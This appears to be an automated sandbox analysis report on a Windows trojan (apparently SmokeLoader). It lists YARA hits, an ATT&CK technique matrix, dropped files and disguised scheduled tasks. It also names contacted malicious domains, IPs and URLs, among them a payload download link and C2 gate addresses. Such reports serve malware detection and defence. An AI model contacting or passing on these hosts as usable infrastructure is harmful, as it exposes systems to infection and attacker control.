Source: Yara match	File source: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1996, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 7144, type: MEMORYSTR
Source: Yara match	File source: 7.2.4470.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.4470.exe.2160e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.fihcrfb.6d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.fihcrfb.6c0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.4470.exe.2170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.fihcrfb.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1520190033.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1809368934.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2067865752.0000000002430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1520136328.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2358792511.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1809608817.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2067913469.0000000002451000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2301467371.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2015538177.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2357485179.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	241 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	2 Disable or Modify Tools	1 OS Credential Dumping	11 System Time Discovery	Remote Services	11 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	13 Native API	Boot or Logon Initialization Scripts	522 Process Injection	1 Deobfuscate/Decode Files or Information	11 Input Capture	3 File and Directory Discovery	Remote Desktop Protocol	1 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	1 Credentials in Registry	259 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Command and Scripting Interpreter	Login Hook	Login Hook	12 Software Packing	NTDS	881 Security Software Discovery	Distributed Component Object Model	11 Input Capture	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	34 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	4 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	34 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	522 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Hidden Files and Directories	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
OCYe9qcxiM.exe	37%	ReversingLabs
OCYe9qcxiM.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Roaming\fihcrfb	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\354F.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\4470.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\hehcrfb	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\hehcrfb	37%	ReversingLabs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://outlook.com	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://api.msn.com/	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
calvinandhalls.com	23.145.40.162	true	true		unknown
nwgrus.ru	187.228.112.175	true	true		unknown

Contacted URLs

Name	Malicious	Reputation
https://23.145.40.164/ksa9104.exe	true	unknown
http://unicea.ws/tmp/index.php	true	unknown
http://nwgrus.ru/tmp/index.php	true	unknown
https://calvinandhalls.com/search.php	true	unknown
http://tech-servers.in.net/tmp/index.php	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 00000002.00000000.1506409569.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://calvinandhalls.com/	explorer.exe, 0000000B.00000002.2429108620.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2429108620.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2429108620.0000000000DD6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://calvinandhalls.com/WN/	explorer.exe, 0000000B.00000002.2429108620.0000000000D58000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/chrome_newtab	explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	false	URL Reputation: safe	unknown
https://powerpoint.office.comer	explorer.exe, 00000002.00000000.1508355661.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://calvinandhalls.com/application/x-www-form-urlencodedMozilla/5.0	explorer.exe, 0000000B.00000002.2429108620.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/ac/?q=	explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	false	URL Reputation: safe	unknown
https://android.notify.windows.com/iOSA4	explorer.exe, 00000002.00000000.1508355661.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT	explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://calvinandhalls.com/search.phpMozilla/5.0	explorer.exe, 0000000B.00000002.2429108620.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2385078500.00000000011A9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3874970360.0000000000C87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3874368668.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3874757842.0000000000B07000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.3873766554.0000000000E29000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world	explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1506409569.00000000091FB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://java.co	explorer.exe, 00000002.00000000.1508355661.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/	explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi	explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://excel.office.com	explorer.exe, 00000002.00000000.1508355661.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1	explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b	explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.micro	explorer.exe, 00000002.00000000.1504054456.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1505677351.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1505690894.0000000007720000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg	explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://wns.windows.com/EM0	explorer.exe, 00000002.00000000.1508355661.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt	explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://calvinandhalls.com/search.php=	explorer.exe, 0000000B.00000002.2429108620.0000000000D81000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	false	URL Reputation: safe	unknown
https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal	explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it	explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.microsoft.c	explorer.exe, 00000002.00000000.1506409569.0000000009237000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09	explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://android.notify.windows.com/iOSd	explorer.exe, 00000002.00000000.1508355661.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi	explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://calvinandhalls.com/earch.php	explorer.exe, 0000000B.00000002.2429108620.0000000000D81000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al	explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k	explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	false		unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark	explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	false	URL Reputation: safe	unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	false	URL Reputation: safe	unknown
http://ns.adobeS	explorer.exe, 00000002.00000000.1504585767.0000000004405000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://outlook.com	explorer.exe, 00000002.00000000.1508355661.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark	explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	false	URL Reputation: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc	explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://calvinandhalls.com:443/search.phpt	explorer.exe, 0000000B.00000002.2429108620.0000000000D93000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000002.00000000.1508355661.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://word.office.com48	explorer.exe, 00000002.00000000.1508355661.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	explorer.exe, 00000002.00000000.1508355661.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg	explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/	explorer.exe, 00000002.00000000.1504995292.000000000702D000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA	explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin	explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com:443/en-us/feed	explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark	explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/weather/topstories/accuweather-el-ni	explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
109.121.204.14	unknown	Bulgaria	21415	INTERNETGROUP-AS-BGBulgariaBG	true
187.228.112.175	nwgrus.ru	Mexico	8151	UninetSAdeCVMX	true
23.145.40.164	unknown	Reserved	22631	SURFAIRWIRELESS-IN-01US	true
23.145.40.162	calvinandhalls.com	Reserved	22631	SURFAIRWIRELESS-IN-01US	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1522699
Start date and time:	2024-09-30 15:36:26 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	42
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	OCYe9qcxiM.exe renamed because original name is a hash value
Original Sample Name:	2a6994149baff1e680719f89062bfcc7.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@63/15@5/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 153 Number of non-executed functions: 118
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 20.114.59.183
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, sls.update.microsoft.com, fe3cr.delivery.mp.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: OCYe9qcxiM.exe

Simulations

Behavior and APIs

Time	Type	Description
09:37:37	API Interceptor	263038x Sleep call for process: explorer.exe modified
09:39:15	API Interceptor	14x Sleep call for process: WMIC.exe modified
15:37:50	Task Scheduler	Run new task: Firefox Default Browser Agent BD8ADC038940B771 path: C:\Users\user\AppData\Roaming\hehcrfb
15:38:44	Task Scheduler	Run new task: Firefox Default Browser Agent 3D6F99141930A61B path: C:\Users\user\AppData\Roaming\fihcrfb

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
23.145.40.164	file.exe	Get hash	malicious	SmokeLoader	Browse
	file.exe	Get hash	malicious	SmokeLoader	Browse
	KTh1gQlT9a.exe	Get hash	malicious	SmokeLoader	Browse
	file.exe	Get hash	malicious	SmokeLoader	Browse
	YPDi0gRMHU.exe	Get hash	malicious	SmokeLoader	Browse
	CNpQfI8eIT.exe	Get hash	malicious	SmokeLoader	Browse
	6NlY2E3Wqi.exe	Get hash	malicious	SmokeLoader	Browse
	4EtLXn5pqI.exe	Get hash	malicious	SmokeLoader	Browse
	RWcyVDbMGQ.exe	Get hash	malicious	SmokeLoader	Browse
	C1APU2jz2B.exe	Get hash	malicious	SmokeLoader	Browse
23.145.40.162	file.exe	Get hash	malicious	SmokeLoader	Browse
	file.exe	Get hash	malicious	SmokeLoader	Browse
	KTh1gQlT9a.exe	Get hash	malicious	SmokeLoader	Browse
	file.exe	Get hash	malicious	SmokeLoader	Browse
	YPDi0gRMHU.exe	Get hash	malicious	SmokeLoader	Browse
	CNpQfI8eIT.exe	Get hash	malicious	SmokeLoader	Browse
	4EtLXn5pqI.exe	Get hash	malicious	SmokeLoader	Browse
	RWcyVDbMGQ.exe	Get hash	malicious	SmokeLoader	Browse
	msvR1bl94M.exe	Get hash	malicious	SmokeLoader	Browse
	78XCPpouJs.exe	Get hash	malicious	SmokeLoader	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
calvinandhalls.com	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	KTh1gQlT9a.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	YPDi0gRMHU.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	CNpQfI8eIT.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	4EtLXn5pqI.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	RWcyVDbMGQ.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	msvR1bl94M.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	78XCPpouJs.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
nwgrus.ru	file.exe	Get hash	malicious	SmokeLoader	Browse	190.249.193.233
	file.exe	Get hash	malicious	SmokeLoader	Browse	210.182.29.70
	KTh1gQlT9a.exe	Get hash	malicious	SmokeLoader	Browse	116.58.10.60
	file.exe	Get hash	malicious	SmokeLoader	Browse	190.13.174.94
	Cjmw6m68OV.exe	Get hash	malicious	SmokeLoader	Browse	109.175.29.39
	file.exe	Get hash	malicious	SmokeLoader	Browse	185.18.245.58
	file.exe	Get hash	malicious	SmokeLoader	Browse	93.118.137.82
	OcH6iVxcMe.exe	Get hash	malicious	SmokeLoader	Browse	211.181.24.133
	file.exe	Get hash	malicious	SmokeLoader	Browse	119.204.11.2
	file.exe	Get hash	malicious	SmokeLoader	Browse	190.218.32.149

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
INTERNETGROUP-AS-BGBulgariaBG	vaex.exe	Get hash	malicious	Sality	Browse	109.121.239.94
	8vlzmXygG4.elf	Get hash	malicious	Mirai	Browse	109.121.221.223
	ZTmnyvVCRS.elf	Get hash	malicious	Mirai	Browse	109.121.221.229
	3nvoeHhdPc.elf	Get hash	malicious	Unknown	Browse	109.121.221.231
	tLIQS3Pca5.exe	Get hash	malicious	Unknown	Browse	109.121.236.68
	x86	Get hash	malicious	Mirai	Browse	109.121.221.235
	MyBcR76ufX.exe	Get hash	malicious	SmokeLoader	Browse	109.121.235.154
	2ZpZixrz18.exe	Get hash	malicious	SmokeLoader	Browse	109.121.235.154
	D9NH6L3n4L.exe	Get hash	malicious	Djvu	Browse	109.121.235.154
	seed.exe	Get hash	malicious	Amadey Djvu Glupteba RedLine SmokeLoader Tofsee Vidar	Browse	109.121.235.154
UninetSAdeCVMX	SecuriteInfo.com.Linux.Siggen.9999.28931.8128.elf	Get hash	malicious	Mirai	Browse	187.223.45.136
	file.exe	Get hash	malicious	Phorpiex	Browse	187.173.216.137
	rsJtZBgpwG.elf	Get hash	malicious	Mirai	Browse	189.181.107.122
	SecuriteInfo.com.Linux.Siggen.9999.1529.24643.elf	Get hash	malicious	Unknown	Browse	189.181.178.51
	CNpQfI8eIT.exe	Get hash	malicious	SmokeLoader	Browse	187.211.53.230
	SecuriteInfo.com.Linux.Siggen.9999.29695.14613.elf	Get hash	malicious	Unknown	Browse	187.218.27.151
	SecuriteInfo.com.Linux.Siggen.9999.31454.15725.elf	Get hash	malicious	Unknown	Browse	201.109.143.199
	SecuriteInfo.com.Linux.Siggen.9999.11593.30273.elf	Get hash	malicious	Unknown	Browse	187.237.52.148
	SecuriteInfo.com.Linux.Siggen.9999.18891.22819.elf	Get hash	malicious	Unknown	Browse	187.170.10.121
	SecuriteInfo.com.Trojan.DownLoader46.2135.11116.25434.exe	Get hash	malicious	Phorpiex	Browse	189.167.37.201
SURFAIRWIRELESS-IN-01US	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	KTh1gQlT9a.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	YPDi0gRMHU.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	CNpQfI8eIT.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	6NlY2E3Wqi.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	4EtLXn5pqI.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	RWcyVDbMGQ.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	C1APU2jz2B.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
SURFAIRWIRELESS-IN-01US	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	KTh1gQlT9a.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
